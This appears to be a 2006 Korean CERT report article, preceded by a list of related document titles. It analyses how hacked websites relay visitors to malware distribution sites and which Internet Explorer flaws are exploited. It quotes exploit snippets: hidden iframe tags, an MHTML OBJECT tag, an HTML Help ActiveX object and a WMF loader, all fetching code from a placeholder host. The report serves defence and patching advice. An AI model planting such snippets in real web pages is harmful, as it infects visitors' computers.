< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>

Similar documents
< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10

월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부

월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2

2006_8_14 (8_17 updated) ms ¿ú(wgareg.exe) ºÐ¼® º¸°í¼�.hwp

2017 년악성코드은닉사이트탐지동향보고서 ( 상반기 ) 악성코드은닉사이트탐지 동향보고서 17 년상반기 1

유포지탐지동향

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 악성코드은닉

<4D F736F F F696E74202D D203120C3D6B1D920C1A4BAB8BAB8C8A320C0A7C7F9B0FA20C4A7C7D8BBE7B0ED20B5BFC7E220B1E8C8ABBCAE202E707

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

*2008년1월호진짜

#WI DNS DDoS 공격악성코드분석

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 13 - 경유지

untitled

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

AhnLab_template

08_spam.hwp

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS

Microsoft PowerPoint 웹 연동 기술.pptx

Secure Programming Lecture1 : Introduction

슬라이드 1

untitled

미쓰리 파워포인트

Microsoft Word - CrossSiteScripting[XSS].docx

SKINFOSEC_TECH_005_China Bot_가칭_ 악성코드 분석_v0.3.doc

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

슬라이드 1


XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응

Windows 8에서 BioStar 1 설치하기

Microsoft Word - Blind Sql Injection.doc

게시판 스팸 실시간 차단 시스템

Microsoft Word - poc_script1.doc

Secure Programming Lecture1 : Introduction

PowerPoint Template

목 차 1. 개 요 배경 요약 정보 대상시스템 원리 공격 기법 및 기본 개념 Heap Spray Font 공 격..

Javascript

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

F O C U S 3 홈페이지를통한악성코드유포및대응방안 FOCUS 고민석 *, 김홍석 **, 이용준 ***, 박정환 **** 최근홈페이지, 웹하드등을해킹하여악성코드를은닉시킴으로써, 접속하는이용자PC를악성코드에감염시키는피해가증가하고있다. 홈페이지, 웹하드는이용자접속이많아

<4D F736F F F696E74202D20C0A5BDA9C5BDC1F6BDC3BDBAC5DB28BDA9C5A9B8B029BCD2B0B3C0DAB7E15F76312E32315FB5F0C4DCC7C3B7AFBDBA2E707074>

< FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

Microsoft PowerPoint - web-part01-ch05-함수.pptx

Microsoft Word FCKeditor.doc

<5BB5BFB8EDB4EB2D E4B5D C0A5BDA9C0C720BAD0BCAEB0FA20B4EBC0C020B9E6BEC82E687770>

<31305FBEC6C0CCC5DB2E687770>

Secure Programming Lecture1 : Introduction

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

untitled

ActFax 4.31 Local Privilege Escalation Exploit

PowerPoint Template

<4D F736F F F696E74202D20322D355FBCD2C7C1C6AEB7B15FBACEBBEABBE7C0CCB9F6BEC8C0FC20C0FCB7AB20BCBCB9CCB3AA5F E707074>

제목 레이아웃

#HNS-WI 금융권및포털사이트이용자대상악성코드및공격기법분석 (v0.1 공개버전 )

(Microsoft PowerPoint - NRMWFKPIIYBC [\310\243\310\257 \270\360\265\345])

웹서버보안취약점대응및조치 교육사이버안전센터

목 차 DEXTUpload Pro 소개 시스템 요구 사항 기능 및 특징 시스템 구성도 벤치마킹 적용 효과 유지보수 안내 담당자 안내

보안 위협 분석 보고서

Ç×°ø¾ÈÀüÁ¤º¸³×Æ®¿öÅ©±¸Ãà¹æ¾È¿¡°üÇÑ¿¬±¸.hwp

취약점분석보고서 [CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit] RedAlert Team_ 강동우

PowerPoint Presentation

Microsoft Word - src.doc

KARAAUTO_4¿ù.qxd-ÀÌÆå.ps, page Normalize

ASEC REPORT VOL.82 October, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서

슬라이드 1

Javascript

(Microsoft Word - \301\266\301\326\272\300_XSS.docx)

Microsoft Word - 제로보드 XE_CSRF증명.doc

암호내지

Microsoft Word - windows server 2003 수동설치_non pro support_.doc

untitled

<736A2DC1A4BAB8C5EBBDC528BFCF292E687770>

PowerPoint 프레젠테이션

5th-KOR-SANGFOR NGAF(CC)

설명 Description 상세정보 네이버에서운영하는서비스중하나인쥬니어네이버 ( 이하쥬니버 ) 에서는쥬니버서비스와 관련하여도움을주기위한 [ 그림 1] 과같은플래시애플리케이션이서비스되고있다.[2] [ 그림 1] 쥬니어네이버에서서비스중인쥬니버도우미플래시애플리케이션 해당플래

메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for

Microsoft Word - Mass SQL Injection_v.1.3._.doc

Security Trend ASEC Report VOL.54 June, 2014

좀비PC

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

I. 서론 FOCUS 한국인터넷진흥원(KISA) 인터넷침해대응센터(KrCERT)는 다양한 방법으로 해킹사고를 탐지하고 있다. 인터넷침해대응센터 자체적으로 보유하고 있는 탐지체계 뿐만 아니라 시스템 담당자들이 직접 신고하는 신고체계 또한 해킹사고 탐지에 있어 중요한 역할

<32BDBAB8B6C6AEC6F9B1DDC0B6B0C5B7A13130B0E8B8EDBEC8B3BBBCAD2E687770>

<C0CCC8ADC1F82E687770>

#HNS-WI 북한의심 APT 공격에대한 Kaspersky 의분석정리

1. 배경 업무 내용이나 개인정보가 담긴 청구서 등을 메일로 전달 시 중요한 정보가 유출되는 경우가 발생하고 있으며, 이에 따른 메일 암호화 솔루션을 도입하고 있으나 기존 ActiveX를 기반으로 한 플러그인 방식은 여러 가지 제약으로 인해 사용성이 저하되고, 고객 대

AhnLab_template

< F69736F6E696E6720BEC7BCBAC4DAB5E520B0A8BFB020BBE7B0EDBAD0BCAE20BAB8B0EDBCAD2E687770>

untitled

<4D F736F F D2035BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월

Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top 20 이다 년 2 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-

슬라이드 1

PowerPoint Presentation

<BACFC7D1B3F3BEF7B5BFC7E22D3133B1C733C8A BFEB2E687770>


Transcription:

악성코드유포지 경유지의공격코드와보안취약점 1. 개요 본고에서는인터넷침해사고대응지원센터에서자체개발 적용하고있는악성코드은닉사이트탐지프로그램에서 2006년 1월부터 3월까지탐지한사이트중 50개를대상으로공격코드및관련소프트웨어취약점을분석한다. 먼저 ( 그림 1) 에서악성코드유포와경유지를구분하고, 2005년이후게재되었던 인터넷침해사고동향및분석월보 관련기사를해당부분에적어보았다. ( 그림 1) 악성코드경유및유포전체과정 [ ] 안의숫자는 [ 참고자료 ] 의번호임 1 공격자는직접개발, 소스코드획득, 알려진도구이용등으로공격용소스코드를생성한다. 트로이잔다운로더생성기 Afu( 阿福 ) 도구를이용하여유포지의공격코드를생성하는사례를 [3] 에서설명하였다. 2 공격자는생성된공격코드를유포지에올린다. 악성코드유포지 란피해자의 PC로최종적으로다운로드되는악성코드가이사이트를통해유포된다는의미로명명된것이다. 유포지는공격자가직접관리하는웹사이트일수있으나추적을피하기위해해킹한웹사이트를이용하는경우가많다. 3 공격자는웹사이트의취약점을악용하여악성코드유포지의공격코드를실행시킬수있는 - 52 -

코드를삽입한다. 이코드를통해 ( 혹은경유해서 ) 사이트를방문한피해자의 PC에서유포지의공격코드가실행되기때문에 악성코드경유지 라고한다. 경유지는상대적으로잘알려지거나신뢰할수있다고판단되는사이트가대상이될수있다. 주로해당웹사이트의웹게시판소프트웨어취약점 ([11]), SQL Injection([9], [10]), 파일업로드취약점 ([6], [10]) 을이용하여경유지악성코드를삽입한다. 삽입되는공격코드의형태를본고의 2장에서설명한다. 4 사용자가경유지를방문하면악성코드유포지의공격코드가실행된다. 5 보안취약점이존재하는사용자의 PC에서유포지의공격코드가성공적으로실행되고추가적인악성코드 ( 드롭퍼, 트로이잔등 ) 가다운로드되어실행된다. 이때주로공격대상이되고있는보안취약점은본고의 3장에서설명한다. 6 유포지를통해감염될수있는악성코드는다양할수있지만현재까지탐지된결과를보면대부분특정게임사이트의아이디와패스워드를유출시키는트로이잔이었다. 트로이잔분석보고서 [7], [8] 에서 4, 5, 6 과정을상세설명하였다. 악성코드유포사이트탐지및대응활동은 [2], [4] 및 인터넷침해사고동향및분석월보 에서계속접할수있다. 2. 악성코드유포지및경유지의공격코드 악성코드경유지에서확인할수있는공격코드에는 frame 또는 iframe 태그가있다. frame 태그는한윈도우안에여러개의문서를보여주기위해사용된다. frame 태그가 frameset 정보를담고있는별도의문서를필요로하는반면 iframe(inline frame) 은 <iframe></iframe> 태그를사용하여다른문서를원하는위치에삽입시킬수있다. <iframe> 태그는원하는위치에다른문서를불러올수있기때문에정상적인웹개발에서는유용하게사용되지만악성코드삽입도수월하게한다. 경유지에삽입된코드는유포지의공격코드를실행시키는링크의역할이므로대부분높이와넓이가 0로서화면에보이지않는다.(ex, width=0 height=0) ( 그림 2) frame 태그를이용한악성코드유포지삽입 ( 그림 3) iframe 태그를이용한악성코드유포지삽입 <script> 태그를사용하여공격용스크립트문서를삽입시키는경우도있는데많이탐지되지는않았다. - 53 -

( 그림 4) script 태그를이용한악성코드유포지삽입 악성코드유포지의공격코드는평문으로작성된경우보다는사용자의육안이나백신제품, 침입탐지시스템에서탐지되지못하도록한가지이상의방법을사용하여인코딩되는경우가많다. 첫째, 가장흔한방법은공격코드를 escape() 함수를사용하여바꾸는것이다. escape() 는알파벳대 소문자와숫자, 몇몇특수문자 (*, @, -, _, +,., /) 를제외한나머지문자를 16진수아스키코드값으로바꾼다. escape() 함수는일반적으로쿠키나파라메터의문자열과예약어와의혼동을피하고, 간단하게웹소스코드를감추기위해사용하며인코딩된문자열은 unescape() 을사용하여원래대로되돌린다. 이와유사하게공격코드를유니코드로작성하는경우도있다. 둘째, 문자열을재조합하거나웹브라우저가엔터, 스페이스바, 탭을무시하고 HTML 문서를파싱하는점을이용, 공백문자열을삽입하여알아보거나탐지하기어렵게하는방법이있다. 셋째, Microsoft사의 Windows Script Encoder를이용하여 javascript나 vbscript로작성한공격용스크립트코드를인코딩한다. Windows Script Encoder는지적재산권보호등의이유로스크립트소스코드를공개하지않기위해사용한다. 이경우 Script Decoder로디코딩하거나테스트환경에서직접실행시켜원래의공격코드를알아낸다. 넷째, 자체개발한인코딩함수를사용한다. 이경우공격코드는인코딩된문자열을디코딩하는함수를포함한다. 디코딩된문자열을 document.write() 등의함수를이용해최종적으로출력하면웹브라우저가이를실행한다. 이와같은방법외에도탐지를피하기위해공격코드를인코딩또는암호화하는방법이다양해지고있다. 유포지의공격코드역시사용자와의상호작용이필요없고탐지를피하기위해화면에보이지않는다. (ex, style="display:none;", width=0 height=0) 3. 악성코드유포에악용되는보안취약점 2장에서설명한것과같이인코딩 암호화방법은다양하지만최종적으로실행되는공격코드는몇가지로압축된다. 50개유포지를대상으로공격대상이되는취약점을 Microsoft사의보안공지명으로분류하면 MS04-013, MS05-001, MS06-001의순이었고, 특히 MS04-013의비중이높았다. - 54 -

악용되는 MS 취약점비율 MS06-001 16% MS04-013 52% MS05-001 32% MS04-013 MS05-001 MS06-001 MS04-013 MHTML URL 처리취약점은특수하게만든 MHTML URL을처리할때 IE의로컬컴퓨터보안영역에서공격자의 HTML 코드가실행될수있는원격코드실행취약점이며, 2004년 4월 14일보안패치가발표되었다 [13]. 아래공격코드에서 "c:\.mht" 파일이존재하지않을경우 ITS 프로토콜핸들러는 http://aaa.bbb.ccc.ddd/index.chm::/aa.htm로접근을시도하게되는데 "c:\.mht" 가 Local Machine Zone( 내컴퓨터영역 ) 이므로 aa.htm 내의악의적인스크립트또한 Local Machine Zone 내에서실행된다 [8]. <OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@msitstore:mhtml:c:.mht!http://aaa.bbb.ccc.ddd/index.chm::/aa.htm"> </OBJECT> MS05-001 HTML 도움말 ActiveX 컨트롤도메인간취약점은 HTML 도움말 ActiveX 컨트롤이정보노출이나원격코드실행을허용하는도메인간취약점이며, 2005년 1월 12일에보안패치가발표되었다 [14]. HTML 도움말 ActiveX 컨트롤 (hhctrl.ocx) 은 HTML 파일에 help 기능을삽입하도록지원하는컴포넌트이다. hhctrl.ocx에인터넷영역과로컬영역을구분하지않는취약점이존재하여사용자의허락없이악성파일이다운로드될수있다 <OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"> <PARAM name="command" value="...... 생략... <PARAM name="item1" value='... 생략...http://aaa.bbb.ccc.ddd... 생략...'> </OBJECT> MS06-001 그래픽렌더링엔진취약점은특수하게조작된 Windows 메타파일 (WMF) 이미지를처리하는방식에서존재하는원격코드실행취약점이며, 2006년 1월 6일에보안패치가발표되었다 [1]. - 55 -

SETABORTPROC는프린트작업이도중에중단되어야할경우호출되는콜백함수를지정하는 Windows GDI API이다. SETABORTPROC 기능이없다면매우큰사이즈의문서를인쇄하는도중에작업을취소해야할경우, 관련프로세스를강제로종료시켜야만하는문제점이발생할수있다. 즉, 이기능자체는보안취약점이라기보다는설계상필요에의해구현된기능이었으나이기능을이용하여원격코드를실행할수있다는점이보안취약점으로남용되고있다 [12]. WMF 취약점을악용하는공격코드는 2006년 1월에집중적으로탐지되는특징을보였다. <iframe src=http://aaa.bbb.ccc.ddd/mailicous.wmf width=0 height=0></iframe> 악성코드유포지에서제로데이공격코드 ( 보안패치미발표취약점을공격 ) 가아닌, MS04-013 MHTML URL 처리취약점과같이다소오래된취약점을공격하는이유는무엇일까? 이것은 MS04-011 LSASS 취약점 (2004년 4월 14일보안패치발표 ) 을감염수단으로이용하는 SASSER 웜이 2005년한해에도웜 바이러스신고현황에서상위를차지하는것과같은이유일것이다. MS04-013 MHTML URL 처리취약점은 - 공격의대상이되는시스템이널리분포하고 Microsoft사의 Windows 운영체제와 IE의사용률이압도적으로높기때문에적은비율의사용자만보안패치를설치하지않아도, 공격대상이광범위하게분포하게됨 - 공격방법이쉬우며 보안의식의향상으로이메일첨부파일이나메신저, P2P 등을통한공격방법이어려워지는반면, 웹사이트를방문하는것만으로도공격이이루어짐 - 공격코드가성공적으로실행될수있다. 운영체제의언어나파일버전과관계없이공격코드가오류를발생하지않고실행됨 4. 결론 본고에서는악성코드유포지및경유지의공격코드와사용된보안취약점의특징을살펴보았다. 악성코드유포지의공격코드를탐지하지못하도록공격코드가더욱더교묘해지고있으나, 공격의대상이되는보안취약점은몇가지로집중된다. 이는사용자입장에서최신보안업데이트를설치하는것이기본적인대응책이된다는점을시사한다. 대응책으로서사용자는의심되는이메일에포함된링크를방문하지않는등안전한브라우징습관을기르고, 개인방화벽과백신제품을사용하며최신보안업데이트를설치해야한다. 한편, 웹사이트개발자 / 운영자는서버운영체제와웹서버, 웹게시판등관련소프트웨어를최신버전으로업데이트하고, 다음을참조하여웹사이트를안전하게운영해야한다. - 웹취약점점검서비스 : http://webcheck.krcert.or.kr - 홈페이지개발보안가이드 : http://www.krcert.or.kr [ 참고자료 ] [1] http://www.microsoft.com/korea/technet/security/bulletin/ms06-001.mspx 인터넷침해사고대응지원센터의 인터넷침해사고동향및분석월보 가운데, [2] 참고자료 : 악성코드유포사이트조기탐지및차단조치, 2006년 2월월보 - 56 -

[3] 트로이잔생성기를이용한악성코드유포지구성사례분석, 2006년 2월월보 [4] 악성코드사이트탐지및대응, 2006년 1월월보 [5] WMF 취약점관련악성코드유포웹사이트및메일서버분석사례, 2006년 1월월보 [6] 업로드취약점을이용한악성코드유포사례, 2005년 10월월보 [7] 웹사이트를통하여전파되는 Trojan 분석, 2005년 9월월보 [8] Hantian, Muma Trojan 분석보고서, 2005년 8월월보 [9] SQL Injection 취약점을이용한악성코드전파사례, 2005년 7월월보 [10] 웹해킹을통한악성코드유포사고사례, 2005년 6월월보 [11] 기업웹해킹을통한 phpbb 웜 (Shell Bot) 유포사례, 2005년 4월월보 [12] WMF 파일에대한 SetAbortProc 남용취약점분석 (MS06-001), 2006년 1월월보 [13] http://www.microsoft.com/korea/technet/security/bulletin/ms04-013.asp [14] http://www.microsoft.com/korea/technet/security/bulletin/ms05-001.mspx - 57 -